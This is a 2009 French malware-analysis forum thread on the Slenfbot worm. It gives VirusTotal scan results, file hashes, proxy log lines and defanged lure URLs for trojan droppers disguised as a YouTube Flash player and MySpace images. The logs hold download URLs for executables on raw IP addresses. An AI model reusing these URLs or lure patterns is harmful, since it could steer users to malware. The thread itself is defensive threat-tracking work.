Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant Email:[email protected]
Admin Email:[email protected]
Billing Email:[email protected]
Tech Email:[email protected]

par **Malekal_morte** » 23 avr. 2009 07:48

hxtp://www.dwn-youtube.info/watchv%3DKduBTtiTI ... player.exe - (208.77.45.132)

Fichier install_flash_player.exe reçu le 2009.04.23 07:38:27 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 5/40 (12.5%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.23 Trojan.Win32.Buzus!IK
AhnLab-V3 5.0.0.2 2009.04.23 -
AntiVir 7.9.0.148 2009.04.22 -
Antiy-AVL 2.0.3.1 2009.04.22 -
Authentium 5.1.2.4 2009.04.22 -
Avast 4.8.1335.0 2009.04.22 -
AVG 8.5.0.287 2009.04.22 -
BitDefender 7.2 2009.04.23 -
CAT-QuickHeal 10.00 2009.04.23 -
ClamAV 0.94.1 2009.04.23 -
Comodo 1127 2009.04.22 -
DrWeb 4.44.0.09170 2009.04.23 -
eSafe 7.0.17.0 2009.04.21 -
eTrust-Vet 31.6.6440 2009.04.20 -
F-Prot 4.4.4.56 2009.04.22 -
F-Secure 8.0.14470.0 2009.04.23 -
Fortinet 3.117.0.0 2009.04.22 -
GData 19 2009.04.23 -
Ikarus T3.1.1.49.0 2009.04.23 Trojan.Win32.Buzus
K7AntiVirus 7.10.710 2009.04.21 -
Kaspersky 7.0.0.125 2009.04.23 -
McAfee 5592 2009.04.22 -
McAfee+Artemis 5592 2009.04.22 -
McAfee-GW-Edition 6.7.6 2009.04.23 Trojan.LooksLike.ATRAPS
Microsoft 1.4602 2009.04.22 -
NOD32 4029 2009.04.22 a variant of Win32/Injector.NJ
Norman 6.00.06 2009.04.22 -
nProtect 2009.1.8.0 2009.04.23 -
Panda 10.0.0.14 2009.04.23 -
PCTools 4.4.2.0 2009.04.23 Trojan.Midgare.EYZ
Prevx1 V2 2009.04.23 -
Rising 21.26.30.00 2009.04.23 -
Sophos 4.40.0 2009.04.23 -
Sunbelt 3.2.1858.2 2009.04.22 -
Symantec 1.4.4.12 2009.04.23 -
TheHacker 6.3.4.0.312 2009.04.23 -
TrendMicro 8.700.0.1004 2009.04.22 -
VBA32 3.12.10.2 2009.04.23 -
ViRobot 2009.4.23.1705 2009.04.23 -
VirusBuster 4.6.5.0 2009.04.22 -
Information additionnelle
File size: 100352 bytes
MD5...: 88887b716aec7e662e51c140db414e48
SHA1..: 9af919d3bcdcf36e9d57a917c5574cb37a3407e8

~~

hxtp://srv146.img-myspace.info/srv146/sort.php?id=DVD-Pictura05.JPEG

Fichier sort.php_id_DVD-Pictura05.JPEG reçu le 2009.04.23 07:38:44 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 7/39 (17.95%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.23 Trojan.Win32.Buzus!IK
AhnLab-V3 5.0.0.2 2009.04.23 -
AntiVir 7.9.0.148 2009.04.22 DR/Delphi.Gen
Antiy-AVL 2.0.3.1 2009.04.22 -
Authentium 5.1.2.4 2009.04.22 -
Avast 4.8.1335.0 2009.04.22 -
AVG 8.5.0.287 2009.04.22 -
BitDefender 7.2 2009.04.23 -
CAT-QuickHeal 10.00 2009.04.23 -
ClamAV 0.94.1 2009.04.23 -
Comodo 1127 2009.04.22 -
DrWeb 4.44.0.09170 2009.04.23 -
eSafe 7.0.17.0 2009.04.21 -
eTrust-Vet 31.6.6440 2009.04.20 -
F-Prot 4.4.4.56 2009.04.22 -
Fortinet 3.117.0.0 2009.04.22 -
GData 19 2009.04.23 -
Ikarus T3.1.1.49.0 2009.04.23 Trojan.Win32.Buzus
K7AntiVirus 7.10.710 2009.04.21 -
Kaspersky 7.0.0.125 2009.04.23 -
McAfee 5592 2009.04.22 -
McAfee+Artemis 5592 2009.04.22 Generic!Artemis
McAfee-GW-Edition 6.7.6 2009.04.23 Trojan.Dropper.Delphi.Gen
Microsoft 1.4602 2009.04.22 -
NOD32 4029 2009.04.22 a variant of Win32/Injector.NJ
Norman 6.00.06 2009.04.22 -
nProtect 2009.1.8.0 2009.04.23 -
Panda 10.0.0.14 2009.04.23 -
PCTools 4.4.2.0 2009.04.23 Trojan.Midgare.EYZ
Prevx1 V2 2009.04.23 -
Rising 21.26.30.00 2009.04.23 -
Sophos 4.40.0 2009.04.23 -
Sunbelt 3.2.1858.2 2009.04.22 -
Symantec 1.4.4.12 2009.04.23 -
TheHacker 6.3.4.0.312 2009.04.23 -
TrendMicro 8.700.0.1004 2009.04.22 -
VBA32 3.12.10.2 2009.04.23 -
ViRobot 2009.4.23.1705 2009.04.23 -
VirusBuster 4.6.5.0 2009.04.22 -
Information additionnelle
File size: 70656 bytes
MD5...: d0ad694545a2af382136cb99d07a3cc1
SHA1..: a0f08833551295b86d3b2507988679be4b3615ed

~~

Code : Tout sélectionner

1240464865.138   1066 192.168.1.200 TCP_MISS/200 32078 GET http://205.209.166.69/netz/rm-dnd.exe - DIRECT/205.209.166.69 application/octet-stream
1240464865.158   1004 192.168.1.200 TCP_MISS/200 32078 GET http://205.209.166.69/netz/rma-oka.exe - DIRECT/205.209.166.69 application/octet-stream

Fichier rm-dnd.exe reçu le 2009.04.23 07:38:37 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 6/40 (15%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.23 Trojan.Win32.Buzus!IK
AhnLab-V3 5.0.0.2 2009.04.23 -
AntiVir 7.9.0.148 2009.04.22 DR/Delphi.Gen
Antiy-AVL 2.0.3.1 2009.04.22 -
Authentium 5.1.2.4 2009.04.22 -
Avast 4.8.1335.0 2009.04.22 -
AVG 8.5.0.287 2009.04.22 -
BitDefender 7.2 2009.04.23 -
CAT-QuickHeal 10.00 2009.04.23 -
ClamAV 0.94.1 2009.04.23 -
Comodo 1127 2009.04.22 -
DrWeb None 2009.04.23 -
eSafe 7.0.17.0 2009.04.21 -
eTrust-Vet 31.6.6440 2009.04.20 -
F-Prot 4.4.4.56 2009.04.22 -
F-Secure 8.0.14470.0 2009.04.23 -
Fortinet 3.117.0.0 2009.04.22 -
GData 19 2009.04.23 -
Ikarus T3.1.1.49.0 2009.04.23 Trojan.Win32.Buzus
K7AntiVirus 7.10.710 2009.04.21 -
Kaspersky 7.0.0.125 2009.04.23 -
McAfee 5592 2009.04.22 -
McAfee+Artemis 5592 2009.04.22 -
McAfee-GW-Edition 6.7.6 2009.04.23 Trojan.Dropper.Delphi.Gen
Microsoft 1.4602 2009.04.22 -
NOD32 4029 2009.04.22 a variant of Win32/Injector.NJ
Norman 6.00.06 2009.04.22 -
nProtect 2009.1.8.0 2009.04.23 -
Panda 10.0.0.14 2009.04.23 -
PCTools 4.4.2.0 2009.04.23 Trojan.Buzus
Prevx1 V2 2009.04.23 -
Rising 21.26.30.00 2009.04.23 -
Sophos 4.40.0 2009.04.23 -
Sunbelt 3.2.1858.2 2009.04.22 -
Symantec 1.4.4.12 2009.04.23 -
TheHacker 6.3.4.0.312 2009.04.23 -
TrendMicro 8.700.0.1004 2009.04.22 -
VBA32 3.12.10.2 2009.04.23 -
ViRobot 2009.4.23.1705 2009.04.23 -
VirusBuster 4.6.5.0 2009.04.22 -
Information additionnelle
File size: 31744 bytes
MD5...: 07a04b94ef9668e71b3dcbdc9c3ba78e
SHA1..: 7864ad8e3bdf2f33abfedda486e5bf663357a402

Fichier rma-oka.exe reçu le 2009.04.23 07:38:31 (CET)
Situation actuelle: en cours de chargement ... mis en file d'attente en attente en cours d'analyse terminé NON TROUVE ARRETE
Résultat: 6/40 (15%)

Antivirus Version Dernière mise à jour Résultat
a-squared 4.0.0.101 2009.04.23 Trojan.Win32.Buzus!IK
AhnLab-V3 5.0.0.2 2009.04.23 -
AntiVir 7.9.0.148 2009.04.22 DR/Delphi.Gen
Antiy-AVL 2.0.3.1 2009.04.22 -
Authentium 5.1.2.4 2009.04.22 -
Avast 4.8.1335.0 2009.04.22 -
AVG 8.5.0.287 2009.04.22 -
BitDefender 7.2 2009.04.23 -
CAT-QuickHeal 10.00 2009.04.23 -
ClamAV 0.94.1 2009.04.23 -
Comodo 1127 2009.04.22 -
DrWeb None 2009.04.23 -
eSafe 7.0.17.0 2009.04.21 -
eTrust-Vet 31.6.6440 2009.04.20 -
F-Prot 4.4.4.56 2009.04.22 -
F-Secure 8.0.14470.0 2009.04.23 -
Fortinet 3.117.0.0 2009.04.22 -
GData 19 2009.04.23 -
Ikarus T3.1.1.49.0 2009.04.23 Trojan.Win32.Buzus
K7AntiVirus 7.10.710 2009.04.21 -
Kaspersky 7.0.0.125 2009.04.23 -
McAfee 5592 2009.04.22 -
McAfee+Artemis 5592 2009.04.22 -
McAfee-GW-Edition 6.7.6 2009.04.23 Trojan.Dropper.Delphi.Gen
Microsoft 1.4602 2009.04.22 -
NOD32 4029 2009.04.22 a variant of Win32/Injector.NJ
Norman 6.00.06 2009.04.22 -
nProtect 2009.1.8.0 2009.04.23 -
Panda 10.0.0.14 2009.04.23 -
PCTools 4.4.2.0 2009.04.23 Trojan.Buzus
Prevx1 V2 2009.04.23 -
Rising 21.26.30.00 2009.04.23 -
Sophos 4.40.0 2009.04.23 -
Sunbelt 3.2.1858.2 2009.04.22 -
Symantec 1.4.4.12 2009.04.23 -
TheHacker 6.3.4.0.312 2009.04.23 -
TrendMicro 8.700.0.1004 2009.04.22 -
VBA32 3.12.10.2 2009.04.23 -
ViRobot 2009.4.23.1705 2009.04.23 -
VirusBuster 4.6.5.0 2009.04.22 -
Information additionnelle
File size: 31744 bytes
MD5...: 922ea7872137ee045d8d83f02c3b4e9c
SHA1..: 71a779bf019d1ffe25c363eb6be46106e60fbc77

par **Malekal_morte** » 26 avr. 2009 13:28

Code : Tout sélectionner

1240742253.837   1043 192.168.1.200 TCP_MISS/200 32590 GET http://205.209.166.69/netz/cc-033.exe - DIRECT/205.209.166.69 application/octet-stream
1240742253.845   1051 192.168.1.200 TCP_MISS/200 32590 GET http://205.209.166.69/netz/bb-129.exe - DIRECT/205.209.166.69 application/octet-stream
1240742256.586   3814 192.168.1.200 TCP_MISS/200 117583 GET http://208.77.45.83/net/dcv.exe - DIRECT/208.77.45.83 application/octet-stream
1240742466.783   1043 192.168.1.200 TCP_MISS/200 32590 GET http://205.209.166.69/netz/bb-390.exe - DIRECT/205.209.166.69 application/octet-stream
1240742466.923   1045 192.168.1.200 TCP_MISS/200 32590 GET http://205.209.166.69/netz/cc-102.exe - DIRECT/205.209.166.69 application/octet-stream
1240742467.454   1511 192.168.1.200 TCP_MISS/200 115023 GET http://208.77.45.83/net/xyz.exe - DIRECT/208.77.45.83 application/octet-stream

Résultat: 7/39 (17.95%)
http://www.virustotal.com/fr/analisis/a ... bc929cc931
http://www.virustotal.com/fr/analisis/9 ... 5147b319c1
http://www.virustotal.com/fr/analisis/2 ... fce23fa5ee
http://www.virustotal.com/fr/analisis/0 ... c5d701290d

Malekal.com forum

Slenfbot

Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Slenfbot : Mi video gracioso!

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot

Re: Slenfbot